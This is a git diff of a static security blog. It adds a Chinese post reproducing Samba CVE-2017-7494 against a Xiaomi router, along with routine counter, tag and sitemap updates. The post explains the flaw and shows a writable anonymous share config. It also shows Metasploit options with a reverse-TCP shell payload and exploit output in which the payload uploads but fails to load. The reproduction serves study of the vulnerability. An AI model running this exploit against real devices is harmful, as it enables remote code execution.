diff --git a/2000/01/01/hello-world/index.html b/2000/01/01/hello-world/index.html index 9c522e1a..3cf49754 100644 --- a/2000/01/01/hello-world/index.html +++ b/2000/01/01/hello-world/index.html @@ -548,7 +548,7 @@ - 9 + 10 日志 @@ -570,7 +570,7 @@
- 21 + 24 标签
@@ -647,7 +647,7 @@ - 13.1k + 14.7k diff --git a/2018/11/16/BIBA访问控制模型实现(python)/index.html b/2018/11/16/BIBA访问控制模型实现(python)/index.html index b4d35243..624ee6cf 100644 --- a/2018/11/16/BIBA访问控制模型实现(python)/index.html +++ b/2018/11/16/BIBA访问控制模型实现(python)/index.html @@ -720,7 +720,7 @@ - 9 + 10 日志 @@ -742,7 +742,7 @@
- 21 + 24 标签
@@ -835,7 +835,7 @@ - 13.1k + 14.7k diff --git a/2018/12/15/miio-control/index.html b/2018/12/15/miio-control/index.html index 4de35218..7e53be4c 100644 --- a/2018/12/15/miio-control/index.html +++ b/2018/12/15/miio-control/index.html @@ -622,7 +622,7 @@ - 9 + 10 日志 @@ -644,7 +644,7 @@
- 21 + 24 标签
@@ -737,7 +737,7 @@ - 13.1k + 14.7k diff --git a/2018/12/23/基于规则引擎发现IOT设备/index.html b/2018/12/23/基于规则引擎发现IOT设备/index.html index bcdb66be..943a98cc 100644 --- a/2018/12/23/基于规则引擎发现IOT设备/index.html +++ b/2018/12/23/基于规则引擎发现IOT设备/index.html @@ -622,7 +622,7 @@ - 9 + 10 日志 @@ -644,7 +644,7 @@
- 21 + 24 标签
@@ -737,7 +737,7 @@ - 13.1k + 14.7k diff --git a/2018/12/25/TCPDUMP拒绝服务攻击漏洞/index.html b/2018/12/25/TCPDUMP拒绝服务攻击漏洞/index.html index 01b9ab72..0e88b736 100644 --- a/2018/12/25/TCPDUMP拒绝服务攻击漏洞/index.html +++ b/2018/12/25/TCPDUMP拒绝服务攻击漏洞/index.html @@ -627,7 +627,7 @@ - 9 + 10 日志 @@ -649,7 +649,7 @@
- 21 + 24 标签
@@ -742,7 +742,7 @@ - 13.1k + 14.7k diff --git a/2019/01/16/wifi半双工侧信道攻击学习笔记/index.html b/2019/01/16/wifi半双工侧信道攻击学习笔记/index.html index c9abd9a7..36dca2a1 100644 --- a/2019/01/16/wifi半双工侧信道攻击学习笔记/index.html +++ b/2019/01/16/wifi半双工侧信道攻击学习笔记/index.html @@ -750,7 +750,7 @@ Server -------wire----------| - 9 + 10 日志 @@ -772,7 +772,7 @@ Server -------wire----------|
- 21 + 24 标签
@@ -865,7 +865,7 @@ Server -------wire----------| - 13.1k + 14.7k diff --git a/2019/02/22/qq数据库的加密解密/index.html b/2019/02/22/qq数据库的加密解密/index.html index 10ffe003..d9bec9df 100644 --- a/2019/02/22/qq数据库的加密解密/index.html +++ b/2019/02/22/qq数据库的加密解密/index.html @@ -599,7 +599,7 @@ - 9 + 10 日志 @@ -621,7 +621,7 @@
- 21 + 24 标签
@@ -714,7 +714,7 @@ - 13.1k + 14.7k diff --git a/2019/03/16/小米固件工具mkxqimage/index.html b/2019/03/16/小米固件工具mkxqimage/index.html index 59eb33fa..e1f812fd 100644 --- a/2019/03/16/小米固件工具mkxqimage/index.html +++ b/2019/03/16/小米固件工具mkxqimage/index.html @@ -606,7 +606,7 @@ - 9 + 10 日志 @@ -628,7 +628,7 @@
- 21 + 24 标签
@@ -721,7 +721,7 @@ - 13.1k + 14.7k diff --git a/2019/03/23/auto-send-WX/index.html b/2019/03/23/auto-send-WX/index.html index 85deda61..c41c505a 100644 --- a/2019/03/23/auto-send-WX/index.html +++ b/2019/03/23/auto-send-WX/index.html @@ -528,6 +528,10 @@
+ +
@@ -612,7 +616,7 @@ - 9 + 10 日志 @@ -634,7 +638,7 @@
- 21 + 24 标签
@@ -727,7 +731,7 @@ - 13.1k + 14.7k diff --git a/2019/03/25/Samba-CVE/index.html b/2019/03/25/Samba-CVE/index.html new file mode 100644 index 00000000..d8c3c47b --- /dev/null +++ b/2019/03/25/Samba-CVE/index.html @@ -0,0 +1,1435 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + 小米路由器与Samba漏洞CVE-2017-7494 | 混元霹雳手 + + + + + + + + + + + + + + + + + + +
+
+ + + +
+
+
+
+ + +
+ + + + + + + + +
+ + + +
+ + + + + + + +
+ + + +

小米路由器与Samba漏洞CVE-2017-7494

+ + + +
+ + + + + +
+ + + + + +

小米路由器与Samba漏洞CVE-2017-7494

漏洞描述

Samba服务器软件存在远程执行代码漏洞。攻击者可以利用客户端将指定库文件上传到具有可写权限的共享目录,会导致服务器加载并执行指定的库文件。
具体执行条件如下:

+
    +
  1. 服务器打开了文件/打印机共享端口445,让其能够在公网上访问

    +
  2. +
  3. 共享文件拥有写入权限

    +
  4. +
  5. 恶意攻击者需猜解Samba服务端共享目录的物理路径

    +
  6. +
+

Samba介绍

Samba是在Linux和Unix系统上实现SMB协议的一个免费软件,由服务器及客户端程序构成。SMB(Server Messages Block,信息服务块)是一种在局域网上共享文件和打印机的一种通信协议,它为局域网内的不同计算机之间提供文件及打印机等资源的共享服务。

+

SMB协议是客户机/服务器型协议,客户机通过该协议可以访问服务器上的共享文件系统、打印机及其他资源。通过设置“NetBIOS over TCP/IP”使得Samba不但能与局域网络主机分享资源,还能与全世界的电脑分享资源。

+

漏洞成因

处于\source3\rpc_server\src_pipe.c的is_known_pipename()函数未对传进来的管道名pipename的路径分隔符/进行识别过滤,导致可以用绝对路径调用恶意的so文件,从而远程任意代码执行。
首先看到is_known_pipename()函数

+

跟进到smb_probe_module()

+

再跟进到do_smb_load_module(),发现调用的过程就在其中,调用了传进来的moudule_name对应的init_samba_module函数

+

我们可以通过smb服务上传一个恶意的so文件,该文件包含一个输出函数init_samba_module,随后通过上述过程进行调用,执行任意代码。

+

漏洞复现

小米路由器

1
2
3
4
5
6
netstat -apnt
tcp 0 0 192.168.31.1:445 0.0.0.0:* LISTEN 0 572 1917/smbd

nmap 192.168.31.1
139/tcp open netbios-ssn
445/tcp open microsoft-ds
+

端口已开启

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
vim /etc/samba/smb.conf
deadtime = 30
domain master = yes
encrypt passwords = true
enable core files = no
guest account = nobody
guest ok = yes
invalid users =
local master = yes
load printers = no
map to guest = Bad User
min receivefile size = 16384
null passwords = yes
obey pam restrictions = yes
passdb backend = smbpasswd
preferred master = yes
printable = no
smb encrypt = disabled
smb passwd file = /etc/samba/smbpasswd
socket options = SO_SNDBUFFORCE=1048576 SO_RCVBUFFORCE=1048576
smb2 max trans = 1048576
smb2 max write = 1048576
smb2 max read = 1048576
write cache size = 262144
syslog = 2
syslog only = yes
use sendfile = yes
writeable = yes
log level = 1
unicode = True
max log size = 500
log file = /tmp/log/samba.log
server role = STANDALONE

[homes]
comment = Home Directories
browsable = no
read only = no
create mode = 0750

[data] ***SMB_SHARE_NAME***
path = /tmp ***SMB_FOLDER***
read only = no ***具备可写权限***
guest ok = yes ***允许匿名***
create mask = 0777
directory mask = 0777

+

具有可写权限、目录为/tmp

+

攻击:使用metasploit

设置攻击参数

靶机是小米路由器R3,它的系统为mips架构,但是这个库好像对它的支持不是很好

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
show options

Module options (exploit/linux/samba/is_known_pipename):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.31.1 yes The target address range or CIDR identifier
RPORT 445 yes The SMB service port (TCP)
SMB_FOLDER no The directory to use within the writeable SMB share
SMB_SHARE_NAME no The name of the SMB share containing a writeable directory


Payload options (generic/shell_reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.216.129 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
7 Linux MIPSLE

+

执行攻击

1
2
3
4
5
6
7
8
9
10
11
12
exploit

[*] Started reverse TCP handler on 192.168.216.129:4444
[*] 192.168.31.1:445 - Using location \\192.168.31.1\data\ for the path
[*] 192.168.31.1:445 - Retrieving the remote path of the share 'data'
[*] 192.168.31.1:445 - Share 'data' has server-side path '/tmp
[*] 192.168.31.1:445 - Uploaded payload to \\192.168.31.1\data\KcQiOcbk.so
[*] 192.168.31.1:445 - Loading the payload from server-side path /tmp/KcQiOcbk.so using \\PIPE\/tmp/KcQiOcbk.so...
[-] 192.168.31.1:445 - >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.168.31.1:445 - Loading the payload from server-side path /tmp/KcQiOcbk.so using /tmp/KcQiOcbk.so...
[-] 192.168.31.1:445 - >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] Exploit completed, but no session was created.
+

虽然报错,但是查看共享文件夹/tmp却发现了生成了.so文件
知乎这篇专栏也有相同问题

+

分析POC,查找原因

(来自Wz’blog)

+

建立SMB连接。若需要账号密码登录,则必须登录后才能继续

从微软上扒的SMB协议建立时序图:

+

对应POC:

+

+

利用NetShareEnumAll遍历目标服务器的共享名(ShareName)以及获取对应的共享文件夹下的可写路径(Path)

+

其中find_writeable_path()函数需要跟进看一下:

+

再跟进看enumerate_directories()以及verify_writeable_directory函数

+

可以看到代码逻辑很清楚,首先遍历出当前路径所有的文件夹,然后尝试往里面写一个随机的txt文件用作可写测试,随后删除掉txt文件,记录下可写的文件路径。
至此,我们得到了一个共享名(即本例中的data)以及其当前路径下的可写目录(/tmp)

+

利用NetShareGetInfo获取共享文件夹的绝对路径(SharePath)


至此获取到了共享名data的绝对路径。
值得注意的是,这里跟早期的Payload不一样,早期的payload是靠暴力猜解目录,所以跟一些分析文章有些出入。现在的Payload是根据NetShareGetInfo直接获取到准确的路径,极大地提高了攻击的成功率。

+

上传恶意so文件


其中写入的so文件是Metasploit生成的反弹shell,很简单的执行一句命令。有一点需要注意的是里面的函数名必须是samba_init_module并且是一个导出函数,这个原因上述的漏洞分析也有提及。

+

调用恶意文件,并执行echo命令打印随机字符串检验是否调用成功


利用从第2步获取到的可写文件目录(Path)以及从第3步得到的共享文件绝对路径(SharePath)构造恶意管道名\PIPE\/SharePath/Path/Evil.so,然后通过SMB_COM_NT_CREATE_ANDX进行调用。
在复现时,调用恶意so文件总会失败,产生Error Code为:STATUS_OBJECT_NAME_NOT_FOUND的错误。尚未能明白为什么会出现这种首次失败的情况,也许要详细看看smb协议才能知道了。
POC代码将STATUS_OBJECT_PATH_INVALID作为我们payload被加载的标志,随后就是用NBSS协议进行了一次远程代码执行的测试,执行代码为echo随机字符串。

+

删除恶意so文件,断开smb连接

+

由msf给出的poc过程可见,对小米路由器的攻击在第五步出现问题,因此出现Failed to load STATUS_OBJECT_NAME_NOT_FOUND

+ + +
+ + + + + + + +
+
+
您的支持将鼓励我继续创作!
+ + +
+ +
+ + + + + +
+ + + +
+ + + +
+ +
+
+ + +
+ + + + + + +
+ +
+ +
+ + + + + +
+ + + + + + + + + +
+
+ + + + +
+ + +
+ + + + +
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/about/index.html b/about/index.html index 83372a99..72eb5a17 100644 --- a/about/index.html +++ b/about/index.html @@ -357,7 +357,7 @@ - 9 + 10 日志 @@ -379,7 +379,7 @@
- 21 + 24 标签
@@ -456,7 +456,7 @@ - 13.1k + 14.7k diff --git a/archives/2000/01/index.html b/archives/2000/01/index.html index 3aa09f49..ec97eb48 100644 --- a/archives/2000/01/index.html +++ b/archives/2000/01/index.html @@ -289,7 +289,7 @@ - 嗯..! 目前共计 9 篇日志。 继续努力。 + 嗯..! 目前共计 10 篇日志。 继续努力。 @@ -387,7 +387,7 @@ - 9 + 10 日志 @@ -409,7 +409,7 @@
- 21 + 24 标签
@@ -486,7 +486,7 @@ - 13.1k + 14.7k diff --git a/archives/2000/index.html b/archives/2000/index.html index 5f24e4fd..d7cea409 100644 --- a/archives/2000/index.html +++ b/archives/2000/index.html @@ -289,7 +289,7 @@ - 嗯..! 目前共计 9 篇日志。 继续努力。 + 嗯..! 目前共计 10 篇日志。 继续努力。 @@ -387,7 +387,7 @@ - 9 + 10 日志 @@ -409,7 +409,7 @@
- 21 + 24 标签
@@ -486,7 +486,7 @@ - 13.1k + 14.7k diff --git a/archives/2018/11/index.html b/archives/2018/11/index.html index be64279a..5c187fd9 100644 --- a/archives/2018/11/index.html +++ b/archives/2018/11/index.html @@ -289,7 +289,7 @@ - 嗯..! 目前共计 9 篇日志。 继续努力。 + 嗯..! 目前共计 10 篇日志。 继续努力。 @@ -387,7 +387,7 @@ - 9 + 10 日志 @@ -409,7 +409,7 @@
- 21 + 24 标签
@@ -486,7 +486,7 @@ - 13.1k + 14.7k diff --git a/archives/2018/12/index.html b/archives/2018/12/index.html index 4f1cc0b0..9f00cc07 100644 --- a/archives/2018/12/index.html +++ b/archives/2018/12/index.html @@ -289,7 +289,7 @@ - 嗯..! 目前共计 9 篇日志。 继续努力。 + 嗯..! 目前共计 10 篇日志。 继续努力。 @@ -457,7 +457,7 @@ - 9 + 10 日志 @@ -479,7 +479,7 @@
- 21 + 24 标签
@@ -556,7 +556,7 @@ - 13.1k + 14.7k diff --git a/archives/2018/index.html b/archives/2018/index.html index 0fdae990..dd4f80cb 100644 --- a/archives/2018/index.html +++ b/archives/2018/index.html @@ -289,7 +289,7 @@ - 嗯..! 目前共计 9 篇日志。 继续努力。 + 嗯..! 目前共计 10 篇日志。 继续努力。 @@ -492,7 +492,7 @@ - 9 + 10 日志 @@ -514,7 +514,7 @@
- 21 + 24 标签
@@ -591,7 +591,7 @@ - 13.1k + 14.7k diff --git a/archives/2019/01/index.html b/archives/2019/01/index.html index aaebb622..6c88e50c 100644 --- a/archives/2019/01/index.html +++ b/archives/2019/01/index.html @@ -289,7 +289,7 @@ - 嗯..! 目前共计 9 篇日志。 继续努力。 + 嗯..! 目前共计 10 篇日志。 继续努力。 @@ -387,7 +387,7 @@ - 9 + 10 日志 @@ -409,7 +409,7 @@
- 21 + 24 标签
@@ -486,7 +486,7 @@ - 13.1k + 14.7k diff --git a/archives/2019/02/index.html b/archives/2019/02/index.html index 35c21233..03dcd640 100644 --- a/archives/2019/02/index.html +++ b/archives/2019/02/index.html @@ -289,7 +289,7 @@ - 嗯..! 目前共计 9 篇日志。 继续努力。 + 嗯..! 目前共计 10 篇日志。 继续努力。 @@ -387,7 +387,7 @@ - 9 + 10 日志 @@ -409,7 +409,7 @@
- 21 + 24 标签
@@ -486,7 +486,7 @@ - 13.1k + 14.7k diff --git a/archives/2019/03/index.html b/archives/2019/03/index.html index 4b0ba700..13faefa9 100644 --- a/archives/2019/03/index.html +++ b/archives/2019/03/index.html @@ -289,7 +289,7 @@ - 嗯..! 目前共计 9 篇日志。 继续努力。 + 嗯..! 目前共计 10 篇日志。 继续努力。 @@ -308,6 +308,41 @@ +
+
+ +

+ + + +

+ + + +
+
+ + + + + + + + + + + + + +
@@ -422,7 +457,7 @@ - 9 + 10 日志 @@ -444,7 +479,7 @@ @@ -521,7 +556,7 @@ - 13.1k + 14.7k diff --git a/archives/2019/index.html b/archives/2019/index.html index b0c2da19..d9c9a63f 100644 --- a/archives/2019/index.html +++ b/archives/2019/index.html @@ -289,7 +289,7 @@ - 嗯..! 目前共计 9 篇日志。 继续努力。 + 嗯..! 目前共计 10 篇日志。 继续努力。 @@ -308,6 +308,41 @@ + + + + + + + + + + + + + + +
@@ -492,7 +527,7 @@ - 9 + 10 日志 @@ -514,7 +549,7 @@ @@ -591,7 +626,7 @@ - 13.1k + 14.7k diff --git a/archives/index.html b/archives/index.html index 97d95203..6b29c92b 100644 --- a/archives/index.html +++ b/archives/index.html @@ -289,7 +289,7 @@ - 嗯..! 目前共计 9 篇日志。 继续努力。 + 嗯..! 目前共计 10 篇日志。 继续努力。 @@ -308,6 +308,41 @@ + + + + + + + + + + + + + + +
@@ -677,7 +712,7 @@ - 9 + 10 日志 @@ -699,7 +734,7 @@ @@ -776,7 +811,7 @@ - 13.1k + 14.7k diff --git a/baidu_urls.txt b/baidu_urls.txt index 762cd855..a3202c5e 100644 --- a/baidu_urls.txt +++ b/baidu_urls.txt @@ -1,5 +1,5 @@ +https://cool-y.github.io/2019/03/25/Samba-CVE/ https://cool-y.github.io/2019/03/23/auto-send-WX/ https://cool-y.github.io/2019/03/16/小米固件工具mkxqimage/ https://cool-y.github.io/2019/02/22/qq数据库的加密解密/ -https://cool-y.github.io/2019/01/16/wifi半双工侧信道攻击学习笔记/ -https://cool-y.github.io/2018/12/25/TCPDUMP拒绝服务攻击漏洞/ \ No newline at end of file +https://cool-y.github.io/2019/01/16/wifi半双工侧信道攻击学习笔记/ \ No newline at end of file diff --git a/baidusitemap.xml b/baidusitemap.xml index 69e8dfb5..cafbcd8f 100644 --- a/baidusitemap.xml +++ b/baidusitemap.xml @@ -1,6 +1,9 @@ + https://cool-y.github.io/2019/03/25/Samba-CVE/ + 2019-03-25 + https://cool-y.github.io/2019/03/23/auto-send-WX/ 2019-03-23 diff --git a/categories/IOT/index.html b/categories/IOT/index.html index bc01bd04..b8b4c25d 100644 --- a/categories/IOT/index.html +++ b/categories/IOT/index.html @@ -290,6 +290,32 @@ + + + + + +
@@ -394,7 +420,7 @@ - 9 + 10 日志 @@ -416,7 +442,7 @@ @@ -493,7 +519,7 @@ - 13.1k + 14.7k diff --git a/categories/index.html b/categories/index.html index b0c5e1ab..dc8629d3 100644 --- a/categories/index.html +++ b/categories/index.html @@ -301,7 +301,7 @@ 目前共计 6 个分类 @@ -359,7 +359,7 @@ - 9 + 10 日志 @@ -381,7 +381,7 @@ @@ -458,7 +458,7 @@ - 13.1k + 14.7k diff --git a/categories/二进制漏洞/index.html b/categories/二进制漏洞/index.html index f84fd36d..2c4e89d7 100644 --- a/categories/二进制漏洞/index.html +++ b/categories/二进制漏洞/index.html @@ -368,7 +368,7 @@ - 9 + 10 日志 @@ -390,7 +390,7 @@ @@ -467,7 +467,7 @@ - 13.1k + 14.7k diff --git a/categories/加密解密/index.html b/categories/加密解密/index.html index 44068f5f..d4302867 100644 --- a/categories/加密解密/index.html +++ b/categories/加密解密/index.html @@ -368,7 +368,7 @@ - 9 + 10 日志 @@ -390,7 +390,7 @@ @@ -467,7 +467,7 @@ - 13.1k + 14.7k diff --git a/categories/杂七杂八/index.html b/categories/杂七杂八/index.html index b49c0051..7f6a1d38 100644 --- a/categories/杂七杂八/index.html +++ b/categories/杂七杂八/index.html @@ -368,7 +368,7 @@ - 9 + 10 日志 @@ -390,7 +390,7 @@ @@ -467,7 +467,7 @@ - 13.1k + 14.7k diff --git a/categories/理论学习/index.html b/categories/理论学习/index.html index f3537efc..b553e32b 100644 --- a/categories/理论学习/index.html +++ b/categories/理论学习/index.html @@ -368,7 +368,7 @@ - 9 + 10 日志 @@ -390,7 +390,7 @@ @@ -467,7 +467,7 @@ - 13.1k + 14.7k diff --git a/categories/顶会论文/index.html b/categories/顶会论文/index.html index dad46874..db6a991c 100644 --- a/categories/顶会论文/index.html +++ b/categories/顶会论文/index.html @@ -394,7 +394,7 @@ - 9 + 10 日志 @@ -416,7 +416,7 @@ @@ -493,7 +493,7 @@ - 13.1k + 14.7k diff --git a/css/main.css b/css/main.css index 7d41bc06..8ec8a039 100644 --- a/css/main.css +++ b/css/main.css @@ -1943,7 +1943,7 @@ pre .javascript .function { width: 4px; height: 4px; border-radius: 50%; - background: #ffe021; + background: #b8ffff; } .links-of-blogroll { font-size: 13px; diff --git a/index.html b/index.html index c4497dc1..a5095074 100644 --- a/index.html +++ b/index.html @@ -286,6 +286,196 @@ +
+ + + +
+ + + + + + + +
+ + + +

+ +

+ + + +
+ + + + + +
+ + + + + + + + 小米路由器与Samba漏洞CVE-2017-7494漏洞描述Samba服务器软件存在远程执行代码漏洞。攻击者可以利用客户端将指定库文件上传到具有可写权限的共享目录,会导致服务器加载并执行指定的库文件。具体执行条件如下: + +服务器打开了文件/打印机共享端口445,让其能够在公网上访问 + +共享文件拥有写 + ... + +
+ + 阅读全文 » + +
+ + + +
+ + + + + + + + + + +
+ + + + + + + + +
+ +
+
+ + + +
+ + + + + + + + + + +
@@ -1996,7 +2186,7 @@ ettercap嗅探智能设备和网关之间的流量sudo ettercap -i ens33 -T -q - 9 + 10 日志 @@ -2018,7 +2208,7 @@ ettercap嗅探智能设备和网关之间的流量sudo ettercap -i ens33 -T -q @@ -2095,7 +2285,7 @@ ettercap嗅探智能设备和网关之间的流量sudo ettercap -i ens33 -T -q - 13.1k + 14.7k diff --git a/search.xml b/search.xml index 7c103559..105aeabc 100644 --- a/search.xml +++ b/search.xml @@ -1,5 +1,18 @@ + + <![CDATA[小米路由器与Samba漏洞CVE-2017-7494]]> + %2F2019%2F03%2F25%2FSamba-CVE%2F + + + IOT + + + Samba + 远程执行 + CVE + + <![CDATA[利用itchat定时转发微信消息]]> %2F2019%2F03%2F23%2Fauto-send-WX%2F diff --git a/sitemap.xml b/sitemap.xml index 43bcb1c3..3c2f6310 100644 --- a/sitemap.xml +++ b/sitemap.xml @@ -1,6 +1,13 @@ + + https://cool-y.github.io/2019/03/25/Samba-CVE/ + + 2019-03-25T13:44:10.764Z + + + https://cool-y.github.io/2019/03/23/auto-send-WX/ diff --git a/tags/CVE/index.html b/tags/CVE/index.html new file mode 100644 index 00000000..0859a6a8 --- /dev/null +++ b/tags/CVE/index.html @@ -0,0 +1,1121 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + 标签: CVE | 混元霹雳手 + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/tags/QQ/index.html b/tags/QQ/index.html index b67d9b84..e164dc58 100644 --- a/tags/QQ/index.html +++ b/tags/QQ/index.html @@ -367,7 +367,7 @@ - 9 + 10 日志 @@ -389,7 +389,7 @@ @@ -466,7 +466,7 @@ - 13.1k + 14.7k diff --git a/tags/SSH/index.html b/tags/SSH/index.html index 442f1a10..d20bcf61 100644 --- a/tags/SSH/index.html +++ b/tags/SSH/index.html @@ -367,7 +367,7 @@ - 9 + 10 日志 @@ -389,7 +389,7 @@ @@ -466,7 +466,7 @@ - 13.1k + 14.7k diff --git a/tags/Samba/index.html b/tags/Samba/index.html new file mode 100644 index 00000000..f1d69210 --- /dev/null +++ b/tags/Samba/index.html @@ -0,0 +1,1121 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + 标签: Samba | 混元霹雳手 + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/tags/TCPDUMP/index.html b/tags/TCPDUMP/index.html index ddae73ac..0a754755 100644 --- a/tags/TCPDUMP/index.html +++ b/tags/TCPDUMP/index.html @@ -367,7 +367,7 @@ - 9 + 10 日志 @@ -389,7 +389,7 @@ @@ -466,7 +466,7 @@ - 13.1k + 14.7k diff --git a/tags/USENIX/index.html b/tags/USENIX/index.html index 9b15fdd2..0a3e0998 100644 --- a/tags/USENIX/index.html +++ b/tags/USENIX/index.html @@ -367,7 +367,7 @@ - 9 + 10 日志 @@ -389,7 +389,7 @@ @@ -466,7 +466,7 @@ - 13.1k + 14.7k diff --git a/tags/index.html b/tags/index.html index 44ab164a..4a435199 100644 --- a/tags/index.html +++ b/tags/index.html @@ -298,10 +298,10 @@ @@ -359,7 +359,7 @@ - 9 + 10 日志 @@ -381,7 +381,7 @@ @@ -458,7 +458,7 @@ - 13.1k + 14.7k diff --git a/tags/itchat/index.html b/tags/itchat/index.html index 1ac28c5e..ea3ee379 100644 --- a/tags/itchat/index.html +++ b/tags/itchat/index.html @@ -367,7 +367,7 @@ - 9 + 10 日志 @@ -389,7 +389,7 @@ @@ -466,7 +466,7 @@ - 13.1k + 14.7k diff --git a/tags/miio/index.html b/tags/miio/index.html index 56912145..df740460 100644 --- a/tags/miio/index.html +++ b/tags/miio/index.html @@ -367,7 +367,7 @@ - 9 + 10 日志 @@ -389,7 +389,7 @@ @@ -466,7 +466,7 @@ - 13.1k + 14.7k diff --git a/tags/python/index.html b/tags/python/index.html index fac412d4..6a445409 100644 --- a/tags/python/index.html +++ b/tags/python/index.html @@ -367,7 +367,7 @@ - 9 + 10 日志 @@ -389,7 +389,7 @@ @@ -466,7 +466,7 @@ - 13.1k + 14.7k diff --git a/tags/wifi/index.html b/tags/wifi/index.html index c564f70c..69200574 100644 --- a/tags/wifi/index.html +++ b/tags/wifi/index.html @@ -367,7 +367,7 @@ - 9 + 10 日志 @@ -389,7 +389,7 @@ @@ -466,7 +466,7 @@ - 13.1k + 14.7k diff --git a/tags/中间人/index.html b/tags/中间人/index.html index e1c81277..5a09fc33 100644 --- a/tags/中间人/index.html +++ b/tags/中间人/index.html @@ -367,7 +367,7 @@ - 9 + 10 日志 @@ -389,7 +389,7 @@ @@ -466,7 +466,7 @@ - 13.1k + 14.7k diff --git a/tags/侧信道攻击/index.html b/tags/侧信道攻击/index.html index affbbb97..b9fcee7f 100644 --- a/tags/侧信道攻击/index.html +++ b/tags/侧信道攻击/index.html @@ -367,7 +367,7 @@ - 9 + 10 日志 @@ -389,7 +389,7 @@ @@ -466,7 +466,7 @@ - 13.1k + 14.7k diff --git a/tags/密码/index.html b/tags/密码/index.html index 60bb4891..88f3bef2 100644 --- a/tags/密码/index.html +++ b/tags/密码/index.html @@ -367,7 +367,7 @@ - 9 + 10 日志 @@ -389,7 +389,7 @@ @@ -466,7 +466,7 @@ - 13.1k + 14.7k diff --git a/tags/小米/index.html b/tags/小米/index.html index b0fe5d68..8db24200 100644 --- a/tags/小米/index.html +++ b/tags/小米/index.html @@ -393,7 +393,7 @@ - 9 + 10 日志 @@ -415,7 +415,7 @@ @@ -492,7 +492,7 @@ - 13.1k + 14.7k diff --git a/tags/微信/index.html b/tags/微信/index.html index 40bed3eb..da2d4162 100644 --- a/tags/微信/index.html +++ b/tags/微信/index.html @@ -367,7 +367,7 @@ - 9 + 10 日志 @@ -389,7 +389,7 @@ @@ -466,7 +466,7 @@ - 13.1k + 14.7k diff --git a/tags/拒绝服务攻击/index.html b/tags/拒绝服务攻击/index.html index 7de33ac1..99ec8028 100644 --- a/tags/拒绝服务攻击/index.html +++ b/tags/拒绝服务攻击/index.html @@ -367,7 +367,7 @@ - 9 + 10 日志 @@ -389,7 +389,7 @@ @@ -466,7 +466,7 @@ - 13.1k + 14.7k diff --git a/tags/数据库/index.html b/tags/数据库/index.html index 4d985c44..94fc5d81 100644 --- a/tags/数据库/index.html +++ b/tags/数据库/index.html @@ -367,7 +367,7 @@ - 9 + 10 日志 @@ -389,7 +389,7 @@ @@ -466,7 +466,7 @@ - 13.1k + 14.7k diff --git a/tags/数据挖掘/index.html b/tags/数据挖掘/index.html index 17e6a13c..f88b8a1e 100644 --- a/tags/数据挖掘/index.html +++ b/tags/数据挖掘/index.html @@ -367,7 +367,7 @@ - 9 + 10 日志 @@ -389,7 +389,7 @@ @@ -466,7 +466,7 @@ - 13.1k + 14.7k diff --git a/tags/文件格式/index.html b/tags/文件格式/index.html index 7fd8445b..6ed6ea45 100644 --- a/tags/文件格式/index.html +++ b/tags/文件格式/index.html @@ -367,7 +367,7 @@ - 9 + 10 日志 @@ -389,7 +389,7 @@ @@ -466,7 +466,7 @@ - 13.1k + 14.7k diff --git a/tags/模型实现/index.html b/tags/模型实现/index.html index e6909cb8..81913b07 100644 --- a/tags/模型实现/index.html +++ b/tags/模型实现/index.html @@ -367,7 +367,7 @@ - 9 + 10 日志 @@ -389,7 +389,7 @@ @@ -466,7 +466,7 @@ - 13.1k + 14.7k diff --git a/tags/自然语言处理/index.html b/tags/自然语言处理/index.html index c203f627..f57b4c60 100644 --- a/tags/自然语言处理/index.html +++ b/tags/自然语言处理/index.html @@ -367,7 +367,7 @@ - 9 + 10 日志 @@ -389,7 +389,7 @@ @@ -466,7 +466,7 @@ - 13.1k + 14.7k diff --git a/tags/访问控制/index.html b/tags/访问控制/index.html index ff115780..8892f1b7 100644 --- a/tags/访问控制/index.html +++ b/tags/访问控制/index.html @@ -367,7 +367,7 @@ - 9 + 10 日志 @@ -389,7 +389,7 @@ @@ -466,7 +466,7 @@ - 13.1k + 14.7k diff --git a/tags/远程执行/index.html b/tags/远程执行/index.html new file mode 100644 index 00000000..13866978 --- /dev/null +++ b/tags/远程执行/index.html @@ -0,0 +1,1121 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + 